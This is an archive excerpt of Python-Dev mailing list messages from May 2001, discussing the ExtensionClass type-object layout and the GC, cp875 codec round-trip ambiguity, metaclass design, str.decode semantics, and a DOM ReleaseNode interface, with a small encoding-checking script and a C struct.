Message-ID: <200105122108.QAA09951@cj20424-a.reston1.va.home.com>

> At some point, extension classes used a literal copy of
> PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so,
> and only had the spare fields that were expected then. Today,
> PyTypeObject has much more fields, so extension objects produce random
> errors (eg. with GC) when used in a modern interpreter (where the copy
> has not been synchronized). Whatever immediately follows the type
> object in memory may be interpreted as GC flag.

Not quite true.  ExtensionClasses (at least recent versions that
worked with 1.5.2) contain a copy of the type object up to and
including the tp_flags field, and the 2.1 code is careful not to use
any newer fields without first checking the corresponding flag bit.

Now, if you are using the 1.4 version of ExtensionClasses you might
not have the tp_flags field either (I don't know, I can't easily
check) but the 1.5.2-compatible version of ExtensionClasses doesn't
even require recompilation to work with Python 2.1.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin at loewis.home.cs.tu-berlin.de  Sat May 12 22:12:39 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sat, 12 May 2001 22:12:39 +0200
Subject: [Python-Dev] Ill-defined encoding for CP875?
Message-ID: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de>

> But I don't know whether the ambiguity in cp875 is a bug or an
> undocumented feature

The official (as in "as official as it gets") mapping between CP 875
and Unicode is at

http://www.unicode.org/Public/MAPPINGS/VENDORS/MICSFT/EBCDIC/CP875.TXT

This is also the file which served as an input to generate cp875.py.

Character 1A, which is the mapping result of these characters, is
indeed known with the name "SUBSTITUTE", apparently following the
definition in

http://www.its.bldrdoc.gov/fs-1037/dir-035/_5170.htm

# substitute character (SUB): A control character that is used in the
# place of a character that is recognized to be invalid or in error or
# that cannot be represented on a given device.

That would suggest that these characters in EBCDIC 875 do not have
equivalents in Unicode. However,

http://www.kostis.net/charsets/ebc875.htm

suggests that the characters in question (3F, DC, E1, EC, ED, FC, and
FD) have no character meaning at all.

It seems that IBM's ICU library also maps U+001A to character 3F, see

http://oss.software.ibm.com/developerworks/opensource/cvs/icu/data/ibm-875_P100-2000.ucm?rev=1.1&content-type=text/x-cvsweb-markup

It appears, from looking at

http://www.natural-innovations.com/boo/asciiebcdic.html

that byte 3F *is* the substitution character in EBCDIC. So it is a bug
in the CP875 codec to map Unicode SUBSTITUTE to an arbitrary EBCDIC
character which is mapped to SUBSTITUTE; I think cp875 should be
corrected to always map U+001A to 3F. That is not something the
generator can currently do, though.

So I think we can take one of two approaches:

1. admit that CP 875 is not round-trippable, and exclude it from the
   test (although when looking at the first 128 characters only, it
   is round-trippable).
2. remove the SUBSTITUTE mappings from CP875, acknowledging that
   apparently these characters have no meaning in that code page.
   Unfortunately, I could not find any official IBM documentation
   page that lists the characters supported in each of the EBCDIC
   code pages.

The second seems to be more corrrect to me, although it is a deviation
from the Unicode consortium publications.

Regards,
Martin


From guido at digicool.com  Sat May 12 23:21:21 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 12 May 2001 16:21:21 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Sat, 12 May 2001 11:07:06 -0400."
             <Pine.NXT.4.21.0105121011450.241-100000@localhost> 
References: <Pine.NXT.4.21.0105121011450.241-100000@localhost> 
Message-ID: <200105122121.QAA10000@cj20424-a.reston1.va.home.com>

> Also: There are two basic implementation models:
> 
> Delegation  [a.k.a. "Lifetime sharing", cloning]
>   sort of like python -- if you don't know how to handle it "ask" 
>   a parent object. ( "ask" in quotes, because I've recently been
>   in a long argument about whether objective-C & smalltalk can
>   really be said to "send messages" , or if it's "just" dynamic
>   lookup and function application! ) 
> 
> Extension  [a.k.a. "Birth sharing", copying, concatenation ]
>   more like how I imaging C++ vtables are built -- the python 
>   equivalent would be like merging all of the class __dict__'s
>   together with name-clase priority going to the nearest
>   relative. 
> 
> ( "Life Sharing" vs. "Birth Sharing" -- is a change in the
>   base class after object creation inherited by the object? )

Interesting.  So is the rest of this thread, but since Python is not a
prototype language and is unlikely to become one, I'd like to mention
that Python 2.2 will likely allow you to choose either paradigm, on a
per-class basis, using metaclasses.

I'm finding metaclasses in Python useful for different things than
they are in Smalltalk, and I expect that they will continue to play a
less important role.  But they are important because they control many
"policy" aspects of Python classes/types: e.g. whether instances have
a __dict__ or a specific set of slots (maybe even typed slots),
whether changes can be made to a class after it's been created, the
semantics of multiple inheritance, and so on.

Right now, my metaclasses continue to be implemented in C, although I
expect that eventually they will be subclassable in Python.  Watch the
descr-branch in the CS tree.  I hope I'll soon have some time to write
a PEP, too.

It's an interesting journey!  The book I am reading about this:
"Putting Metaclasses to Work" by Ira Forman and Scott Danforth.
http://cseng.awl.com/book/0,3828,0201433052,00.html

--Guido van Rossum (home page: http://www.python.org/~guido/)


From sdm7g at Virginia.EDU  Sat May 12 22:53:26 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Sat, 12 May 2001 16:53:26 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com>
Message-ID: <Pine.NXT.4.21.0105121640050.261-100000@localhost>


On Sat, 12 May 2001, Guido van Rossum wrote:

> Interesting.  So is the rest of this thread, but since Python is not a
> prototype language and is unlikely to become one, I'd like to mention
> that Python 2.2 will likely allow you to choose either paradigm, on a
> per-class basis, using metaclasses.

 As I said earlier: the only advantage would be if it could simplify 
things "under the hood" (compared to metaclasses) but could still 
provide the same Class semantics (with maybe a "proto" declaration
sneaking it's nose in under the tent.) 
 But I have no immediate idea on how to do that, and it sounds like
you're pretty far along into an implementation already. 

> I'm finding metaclasses in Python useful for different things than
> they are in Smalltalk, and I expect that they will continue to play a
> less important role.  But they are important because they control many
> "policy" aspects of Python classes/types: e.g. whether instances have
> a __dict__ or a specific set of slots (maybe even typed slots),
> whether changes can be made to a class after it's been created, the
> semantics of multiple inheritance, and so on.

 I guess my practical quesion, which I meant to ask before I got
myself sidetracked into preaching prototypes is: How much of the
existing plumbing (specifically the Don Beaudry hack) can I rely
on in the future for the objective-C/python bridge ? 
 With BOOST and Zope's extension classes relying on it, can I 
assume that it's being extended rather than replaced ? 
( I guess I ought to take a look at the code! ) 

> It's an interesting journey!  The book I am reading about this:
> "Putting Metaclasses to Work" by Ira Forman and Scott Danforth.
> http://cseng.awl.com/book/0,3828,0201433052,00.html

Thanks for the reference. 
Talking about interesting journies: 

 Guido: did you ever imagine back at that first workshop at NIST
that you and Python would be where you are today ? 


-- Steve Majewski 


From gmcm at hypernet.com  Sat May 12 23:09:41 2001
From: gmcm at hypernet.com (Gordon McMillan)
Date: Sat, 12 May 2001 17:09:41 -0400
Subject: [Python-Dev] Type/class
In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com>
References: Your message of "Sat, 12 May 2001 11:07:06 -0400."             <Pine.NXT.4.21.0105121011450.241-100000@localhost> 
Message-ID: <3AFD6E55.1096.B4BFBD3F@localhost>

[Guido]
> It's an interesting journey!  The book I am reading about this:
> "Putting Metaclasses to Work" by Ira Forman and Scott Danforth.
> http://cseng.awl.com/book/0,3828,0201433052,00.html

The two things that struck me most when I read that last year:
 
 - How eminently ill-suited C++ is for this stuff (the book 
develops a framework in C++)

 - a very convincing argument that if you derive C from A and B 
(whose metaclasses are not the same), the system must 
derive a metaclass for C, using MI from A and B's 
metaclasses.

duct-tape-skull-cap-advised-ly y'rs

- Gordon


From tim.one at home.com  Sat May 12 23:22:49 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 12 May 2001 17:22:49 -0400
Subject: [Python-Dev] Ill-defined encoding for CP875?
In-Reply-To: <02e501c0dade$ab7f1080$e46940d5@hagrid>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEMNKBAA.tim.one@home.com>

[/F]
> reverse sorting makes sense to me.  but the cp-files appear to be
> machine generated, so patching that python file won't help.

Agreed.

> a truly future-proof solution would be to specify exactly how to
> resolve every many-to-one mapping, for every font having that
> problem.  but sorting them is clearly better than relying on
> implementation-dependent behaviour...

The attached program suggests the problem is rare; of those encoding files
that have a Python decode_map dict, only these triggered a meaningful
ambiguity complaint:

*** cp1006.py maps 0xfe8e back to 0xb1, 0xb2
*** cp875.py maps 0x1a back to 0x3f, 0xdc, 0xe1, 0xec, 0xed, 0xfc, 0xfd

Then since test_unicode only checks for roundtrip across range(0x80), cp875
is the only one that *can* fail (the ambiguities in cp1006 are for points >
0x7f, so aren't tested here).

Hmm!  Now I see that in a part of test_unicode that wasn't reached, cp875 and
cp1006 are excluded, with this comment:

    ### These fail the round-trip:
    #'cp1006', 'cp875', 'iso8859_8',

So the practical hack for now is to exclude cp875 from the earlier range(128)
roundtrip test too.

> (is Jython using exactly the same hashing and dictionary algorithms as
> CPython?  or does it work by accident also under Jython?)

Sorry, no idea.  Attempting to browse the Jython source on SourceForge caused
this cute behavior:

http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/jython/jython/Lib/

    Python Exception Occurred

    Traceback (innermost last):
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 2286, in ?
        main()
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 2253, in main
        view_directory(request)
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 1043, in view_directory
        fileinfo, alltags = get_logs(full_name, rcs_files, view_tag)
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 987, in get_logs
        raise 'error during rlog: '+hex(status)
    error during rlog: 0x100

let's-rewrite-it-in-php<wink>-ly y'rs  - tim

ENCODING_DIR = "../Lib/encodings"

import os
import imp

def d(w):
    if type(w) is type(6):
        return hex(w)
    else:
        return repr(w)

encfiles = [name for name in os.listdir(ENCODING_DIR)
                 if name.endswith(".py") and name[0] != "_"]

for fname in encfiles:
    path = os.path.join(ENCODING_DIR, fname)
    f = open(path)
    module = imp.load_source(fname[:-3], path, f)
    f.close()
    decode = getattr(module, "decoding_map", None)
    if decode is None:
        print fname, "doesn't have decoding_map."
        continue
    vtok = {}
    for k, v in decode.items():
        if v in vtok:
            vtok[v].append(k)
        else:
            vtok[v] = [k]
    ambiguous = [(v, ks) for v, ks in vtok.items()
                         if len(ks) > 1]
    if ambiguous:
        for v, ks in ambiguous:
            ks.sort()
            print "***", fname, "maps", d(v), "back to", \
                  ", ".join(map(d, ks))
    else:
        print fname, "is free of ambiguous reverse maps."


From tim.one at home.com  Sat May 12 23:48:38 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 12 May 2001 17:48:38 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOENCKBAA.tim.one@home.com>

[Martin v. Loewis, whose encyclopedic knowledge of encoding details
 still isn't enough to get a clear answer (it's like somebody asking
 me for a simple answer to a floating point question <wink>]

> ...
> So I think we can take one of two approaches:
>
> 1. admit that CP 875 is not round-trippable, and exclude it from the
>    test (although when looking at the first 128 characters only, it
>    is round-trippable).

As I noted later, 875 is already excluded from the roundtrip test across
range(128, 256).  What it's failing is the roundtrip test across range(128):
after unicode("?", "cp875") produces u'\x1a', the following .encode('c875')
has no way to know which range the original input came from.  So it's not
really round-trippable across range(128) either unless more info is given to
.encode().

> 2. remove the SUBSTITUTE mappings from CP875, acknowledging that
>    apparently these characters have no meaning in that code page.
>    Unfortunately, I could not find any official IBM documentation
>    page that lists the characters supported in each of the EBCDIC
>    code pages.
>
> The second seems to be more corrrect to me, although it is a deviation
> from the Unicode consortium publications.

Until you and MAL agree on the best thing to do (I have no opinion:  my only
exposure to Unicode in daily programming life remains the Python test suite),
I'm going to opt for #1:  as cp875.py stands today, it's simply a fact that
it's not round-trippable across any range including 0x3f.


From martin at loewis.home.cs.tu-berlin.de  Sun May 13 00:32:10 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 13 May 2001 00:32:10 +0200
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <200105122108.QAA09951@cj20424-a.reston1.va.home.com> (message
	from Guido van Rossum on Sat, 12 May 2001 16:08:05 -0500)
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com>
Message-ID: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>

> Now, if you are using the 1.4 version of ExtensionClasses you might
> not have the tp_flags field either (I don't know, I can't easily
> check) but the 1.5.2-compatible version of ExtensionClasses doesn't
> even require recompilation to work with Python 2.1.

I'll attach a copy below of the struct as defined in
pygtk-0.7.0-unstable-dont-use.tar.gz (0.6.6 does not use extension
classes). As you can see, it does not provide tp_flags, but has a
field of tp_xxx4 for it.

That *should* work, except that it also has its 'methods' field where
tp_traverse would go, and its class_flags field where tp_clear would
go.

Now, you write

> ExtensionClasses (at least recent versions that worked with 1.5.2)
> contain a copy of the type object up to and including the tp_flags
> field, and the 2.1 code is careful not to use any newer fields
> without first checking the corresponding flag bit.

In this generality, it is apparently not true: Modules/gcmodule.c has,
in delete_garbage,

			if ((clear = op->ob_type->tp_clear) != NULL) {
...
		traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse;
		(void) traverse(PyObject_FROM_GC(gc),
			       (visitproc)visit_decref,
			       NULL);

which does not check any flags. That still shouldn't cause any
problems, since the Gtk objects should never end up in the GC lists -
but may be I'm missing something.

Regards,
Martin

typedef struct {
	PyObject_VAR_HEAD
	char *tp_name; /* For printing */
	int tp_basicsize, tp_itemsize; /* For allocation */
	
	/* Methods to implement standard operations */
	
	destructor tp_dealloc;
	printfunc tp_print;
	getattrfunc tp_getattr;
	setattrfunc tp_setattr;
	cmpfunc tp_compare;
	reprfunc tp_repr;
	
	/* Method suites for standard classes */
	
	PyNumberMethods *tp_as_number;
	PySequenceMethods *tp_as_sequence;
	PyMappingMethods *tp_as_mapping;

	/* More standard operations (at end for binary compatibility) */

	hashfunc tp_hash;
	ternaryfunc tp_call;
	reprfunc tp_str;
	getattrofunc tp_getattro;
	setattrofunc tp_setattro;
	/* Space for future expansion */
	long tp_xxx3;
	long tp_xxx4;

	char *tp_doc; /* Documentation string */

#ifdef COUNT_ALLOCS
	/* these must be last */
	int tp_alloc;
	int tp_free;
	int tp_maxalloc;
	struct _typeobject *tp_next;
#endif
  PyMethodChain methods;
  long class_flags;
  PyObject *class_dictionary;
  PyObject *bases;
  PyObject *reserved;
} PyExtensionClass;


From martin at loewis.home.cs.tu-berlin.de  Sun May 13 14:08:02 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 13 May 2001 14:08:02 +0200
Subject: [Python-Dev] ReleaseNode interface in 4XSLT
Message-ID: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de>

Currently, 4XSLT has a dependency on the DOM implementation in terms
of memory management (among other dependencies). I'd like to reduce
this dependency, by providing a centralized function that knows how to
release nodes.

In PyXML, I currently use

# Define ReleaseNode in a DOM-independent way
import xml.dom.ext
import xml.dom.minidom
def _releasenode(n):
    if isinstance(n, xml.dom.minidom.Node):
        n.unlink()
    else:
        xml.dom.ext.ReleaseNode(n)

try:
    from Ft.Lib import pDomlette
    def ReleaseNode(n):
        if isinstance(n, pDomlette.Node):
            pDomlette.ReleaseNode(n)
        else:
            _releasenode(n)
    _XsltElementBase = pDomlette.Element
except ImportError:
    ReleaseNode = _releasenode
    from minisupport import _XsltElementBase

This code knows how to release minidom, 4DOM, and pDomlette nodes, and
supports installations without 4Suite (i.e. without pDomlette). I've
put this into xslt/__init__.py, so that all callers of
Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode.
If desired, I could produce a patch against the public Ft CVS.

As a slightly independent question, such a function also ought to
support DOM implementations not known to it; I'm thinking in
particular of the Zope DOMs. I'd like to hear proposals on how such an
interface should work; I see three options:

a) it is an operation on the document node (or any node), as in minidom.
b) it is an operation on the DOM implementation (almost as in 4Suite;
   you'd need to navigate from the node to the implementation, then
   you'd need a well-known operation on the implementation)
c) the code assumes that no release activity is necessary for unknown
   DOMs, effectively believing in reference counting, garbage collection,
   acquisition, and other black art.

Any comments appreciated, in particular
1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and
2. from authors of other DOMs on a general memory management API for
   Python DOM.

Regards,
Martin


From mwh at python.net  Sun May 13 14:36:26 2001
From: mwh at python.net (Michael Hudson)
Date: 13 May 2001 13:36:26 +0100
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: "M.-A. Lemburg"'s message of "Fri, 11 May 2001 12:07:40 +0200"
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com>
Message-ID: <m31yptqvcl.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal at lemburg.com> writes:

> Fredrik Lundh wrote:
> > can you take that again?  shouldn't michael's example be
> > equivalent to:
> > 
> >     unicode(u"\u00e3".encode("latin-1"), "latin-1")
> > 
> > if not, I'd argue that your "decode" design is broken, instead
> > of just buggy...
> 
> Well, it is sort of broken, I agree. The reason is that 
> PyString_Encode() and PyString_Decode() guarantee the returned
> object to be a string object. To be able to reuse Unicode codecs
> I added code which converts Unicode back to a string in case the
> codec return an Unicode object (which the .decode() method does).
> This is what's failing.

It strikes me that if someone executes

aString.decode("latin-1")

they're going to expect a unicode string.  AIUI, what's currently
happening is that the string is converted from a latin-1 8-bit string
to the 16-bit unicode string I expected and then there is an attempt
to convert it back to an 8-bit string using the default encoding.  So
if I'd done a 

sys.setdefaultencoding("latin-1")

in my sitecustomize.py, then aString.decode("latin-1") would just be
aString again?  This doesn't seem optimal.

> Perhaps I should simply remove the restriction and have both APIs
> return the codec's return object as-is ?! (I would be in favour of
> this, but I'm not sure whether this is already in use by someone...)

Are all the codecs ditributed with Python 2.1 unicode-related?  If
that's the case, PyString_Decode isn't terribly useful is it?  It
seems unlikely that it received much use.  Could be wrong of course.

OTOH, maybe I'm trying to wedge to much behaviour onto a a particular
operation.  Do we want

open(file).read().decode("jpeg") -> some kind of PIL object

to be possible?

Cheers,
M.

-- 
  GET   *BONK*
  BACK  *BONK*
  IN    *BONK*
  THERE *BONK*             -- Naich using the troll hammer in cam.misc


From mal at lemburg.com  Sun May 13 18:53:55 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 13 May 2001 18:53:55 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com> <m31yptqvcl.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3AFEBC22.1F0AF685@lemburg.com>

Michael Hudson wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com> writes:
> 
> > Fredrik Lundh wrote:
> > > can you take that again?  shouldn't michael's example be
> > > equivalent to:
> > >
> > >     unicode(u"\u00e3".encode("latin-1"), "latin-1")
> > >
> > > if not, I'd argue that your "decode" design is broken, instead
> > > of just buggy...
> >
> > Well, it is sort of broken, I agree. The reason is that
> > PyString_Encode() and PyString_Decode() guarantee the returned
> > object to be a string object. To be able to reuse Unicode codecs
> > I added code which converts Unicode back to a string in case the
> > codec return an Unicode object (which the .decode() method does).
> > This is what's failing.
> 
> It strikes me that if someone executes
> 
> aString.decode("latin-1")
> 
> they're going to expect a unicode string.  AIUI, what's currently
> happening is that the string is converted from a latin-1 8-bit string
> to the 16-bit unicode string I expected and then there is an attempt
> to convert it back to an 8-bit string using the default encoding.  So
> if I'd done a
> 
> sys.setdefaultencoding("latin-1")
> 
> in my sitecustomize.py, then aString.decode("latin-1") would just be
> aString again?  This doesn't seem optimal.

True and that's why I am proposing to losen the restriction 
on having the two APIs returning strings only.
 
> > Perhaps I should simply remove the restriction and have both APIs
> > return the codec's return object as-is ?! (I would be in favour of
> > this, but I'm not sure whether this is already in use by someone...)
> 
> Are all the codecs ditributed with Python 2.1 unicode-related?  If
> that's the case, PyString_Decode isn't terribly useful is it?  It
> seems unlikely that it received much use.  Could be wrong of course.

All standard codecs in 2.0 and 2.1 are Unicode related. I am
planning to write up a bunch of string-to-string codecs next
week though which will then be the first non-Unicode related
codecs in 2.2.

> OTOH, maybe I'm trying to wedge to much behaviour onto a a particular
> operation.  Do we want
> 
> open(file).read().decode("jpeg") -> some kind of PIL object
> 
> to be possible?

This would be possible indeed. Even though some may find this
coding style obscure, I think this technique has the same
usefulness as e.g. piping at OS level.

I am thinking of these use cases:

"???".decode("latin-1") -> Unicode (object construction)
"...jpeg data...".decode("jpeg") -> JpegImage object (dito)
"???".decode("latin-1").encode("cp1521") -> string (recoding data)
"...long data...".encode("gzip") -> string (transfer encoding)
"...gzipped data...".decode("gzip") -> string (transfer decoding)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Sun May 13 19:20:01 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 13 May 2001 19:20:01 +0200
Subject: [Python-Dev] Re: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>
Message-ID: <3AFEC241.62084286@lemburg.com>

Tim Peters wrote:
> 
> I have a way to make dict lookup a teensy bit cheaper(*) that significantly
> reduces the number of collisions (which is much more valuable).
> 
> This caused a number of std tests to fail, because they were implicitly
> relying on the order in which a dict's entries are materialized via .keys()
> or .items().
> 
> Most of these were easy enough to fix.  The last failure remaining is
> test_unicode, and I don't know how to fix it.  It's dying here:
> 
>     try:
>         verify(unicode(s,encoding).encode(encoding) == s)
>     except TestFailed:
>         print '*** codec "%s" failed round-trip' % encoding
>     except ValueError,why:
>         print '*** codec for "%s" failed: %s' % (encoding, why)
> 
> when encoding == "cp875".  There's a bogus problem you have to worm around
> first:  test_unicode neglected to import TestFailed, so it actually dies
> with NameError while trying the "except TestFailed" clause after verify()
> raises TestFailed.  Once that's repaired, it's complaining about failing the
> round-trip encoding.

Ooops; this must have been caused by the assert statment
removal in the test suite I hacked up some months ago. Funny that
it never showed up... the code seems to be very robust ;-)
 
> The original character in s it's griping about is "?" (0x3f).  cp875.py has
> this entry in its decoding_map dict:
> 
>         0x003f: 0x001a, # SUBSTITUTE
> 
> But 0x1a is not a *unique* value in this dict.  There's also
> 
>         0x00dc: 0x001a, # SUBSTITUTE
>         0x00e1: 0x001a, # SUBSTITUTE
>         0x00ec: 0x001a, # SUBSTITUTE
>         0x00ed: 0x001a, # SUBSTITUTE
>         0x00fc: 0x001a, # SUBSTITUTE
>         0x00fd: 0x001a, # SUBSTITUTE
> 
> Therefore what appears associated with 0x1a in the derived encoding_map
> dict:
> 
> encoding_map = {}
> for k,v in decoding_map.items():
>     encoding_map[v] = k
> 
> may end up being any of the 7 decoding_map keys that map to 0x1a.  It just
> so happened to map back to 0x3f before, but to 0xfd after the dict change,
> so "?" doesn't survive the round trip anymore.

The "right" thing to do here, is to simply remove cp875
from the test for round-tripping. It is not the only encoding
which fails this test, but it's not our fault: the codecs were
all generated from the original codec maps at the Unicode.org site.

If their mappings are broken, we can't do much about it... other
than to ignore the error or remove the codec altogether.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Sun May 13 19:40:58 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 13 May 2001 19:40:58 +0200
Subject: [Python-Dev] IDLE and non-ASCII characters
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de>
Message-ID: <3AFEC72A.33076220@lemburg.com>

Martin von Loewis wrote:
> 
> Thanks to a bug report I got, I noticed for the first time that you
> cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell
> prompt, you may get
> 
> >>> s='??'
> UnicodeError: ASCII encoding error: ordinal not in range(128)
> 
> Likewise, when trying to save a file that has non-ASCII characters,
> you get a traceback.
> 
> Now, I think I understand all the causes of the problem (Tkinter
> returning Unicode objects, and so on). However, I'm curious whether
> anybody has proposals on how to deal with it.
> 
> For saving text files, if Python had an encoding directive, things
> might be easier :-) For the shell prompt, I've no idea how to solve
> this best.
> 
> So any suggestions are welcome.

I have a bug report assigned to myself which indicates similar
problems with _tkinter and Tk/Tcl. There were other problem
reports on the German Python mailing list going in the same
direction too.

The basic problem seems to be that Tk/Tcl applies too much
magic to the text widget contents in order to find out the
used encoding and this can easily cause the whole encoding
mechanism to fail.

A Tk/Tcl expert should really look into this and fix _tkinter.c
to aid Tk/Tcl in not mixing up the encodings (e.g. it would
probably be a good idea to recode Python 8bit-strings into
whatever encoding Tk/Tcl assumes as default).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From Mike.Olson at fourthought.com  Sun May 13 20:15:46 2001
From: Mike.Olson at fourthought.com (Mike Olson)
Date: Sun, 13 May 2001 12:15:46 -0600
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de>
Message-ID: <3AFECF52.FF7E9B26@FourThought.com>

"Martin v. Loewis" wrote:
> 
> 
> In PyXML, I currently use
> 
> # Define ReleaseNode in a DOM-independent way
> import xml.dom.ext
> import xml.dom.minidom
> def _releasenode(n):
>     if isinstance(n, xml.dom.minidom.Node):
>         n.unlink()
>     else:
>         xml.dom.ext.ReleaseNode(n)
> 
> try:
>     from Ft.Lib import pDomlette
>     def ReleaseNode(n):
>         if isinstance(n, pDomlette.Node):
>             pDomlette.ReleaseNode(n)
>         else:
>             _releasenode(n)
>     _XsltElementBase = pDomlette.Element
> except ImportError:
>     ReleaseNode = _releasenode
>     from minisupport import _XsltElementBase
> 
> This code knows how to release minidom, 4DOM, and pDomlette nodes, and
> supports installations without 4Suite (i.e. without pDomlette). I've
> put this into xslt/__init__.py, so that all callers of
> Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode.
> If desired, I could produce a patch against the public Ft CVS.

What if we put these on the implementation, that or came up with a
standard interface on the node.  Then, every DOM imp that wants to be
compatible with xpath/xslt needs to support this interface?


node.ownerDocument.implementation.releaseNode(node)

or

node.py_unlink()


> 
> As a slightly independent question, such a function also ought to
> support DOM implementations not known to it; I'm thinking in
> particular of the Zope DOMs. I'd like to hear proposals on how such an
> interface should work; I see three options:

See above

> 
> a) it is an operation on the document node (or any node), as in minidom.
> b) it is an operation on the DOM implementation (almost as in 4Suite;
>    you'd need to navigate from the node to the implementation, then
>    you'd need a well-known operation on the implementation)
> c) the code assumes that no release activity is necessary for unknown
>    DOMs, effectively believing in reference counting, garbage collection,
>    acquisition, and other black art.

I like either a or b

Mike

> 
> Any comments appreciated, in particular
> 1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and
> 2. from authors of other DOMs on a general memory management API for
>    Python DOM.
> 
> Regards,
> Martin
> 
> _______________________________________________
> 4suite mailing list
> 4suite at lists.fourthought.com
> http://lists.fourthought.com/mailman/listinfo/4suite

-- 
Mike Olson				 Principal Consultant
mike.olson at fourthought.com               (303)583-9900 x 102
Fourthought, Inc.                         http://Fourthought.com 
Software-engineering, knowledge-management, XML, CORBA, Linux, Python


From tim.one at home.com  Sun May 13 20:31:42 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 13 May 2001 14:31:42 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <3AFEC241.62084286@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOMKBAA.tim.one@home.com>

[M.-A. Lemburg]
> ...
> The "right" thing to do here, is to simply remove cp875
> from the test for round-tripping.

I'm relieved you think so, since that's what I already did <wink>.

> It is not the only encoding which fails this test, but it's not
> our fault: the codecs were all generated from the original codec
> maps at the Unicode.org site.
>
> If their mappings are broken, we can't do much about it... other
> than to ignore the error or remove the codec altogether.

On general principle I don't like either of those -- "in the face of
ambiguity, refuse the temptation to guess".  It's at least surprising to see

>>> unicode("?", "cp875").encode("cp875")
'\xfd'
>>>

now, yes?  Would it be better if an ambiguous encoding raised an exception in
"strict" mode?  That is, a third choice is to alert users when they're
relying on a broken part of a mapping.


From martin at loewis.home.cs.tu-berlin.de  Sun May 13 21:08:47 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 13 May 2001 21:08:47 +0200
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
In-Reply-To: <3AFECF52.FF7E9B26@FourThought.com> (message from Mike Olson on
	Sun, 13 May 2001 12:15:46 -0600)
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com>
Message-ID: <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de>

> What if we put these on the implementation, that or came up with a
> standard interface on the node.  Then, every DOM imp that wants to be
> compatible with xpath/xslt needs to support this interface?
> 
> 
> node.ownerDocument.implementation.releaseNode(node)
> 
> or
> 
> node.py_unlink()

releaseNode sounds good to me; it is unlikely that W3C would give an
operation that name but a different meaning. Any objections?

Regards,
Martin


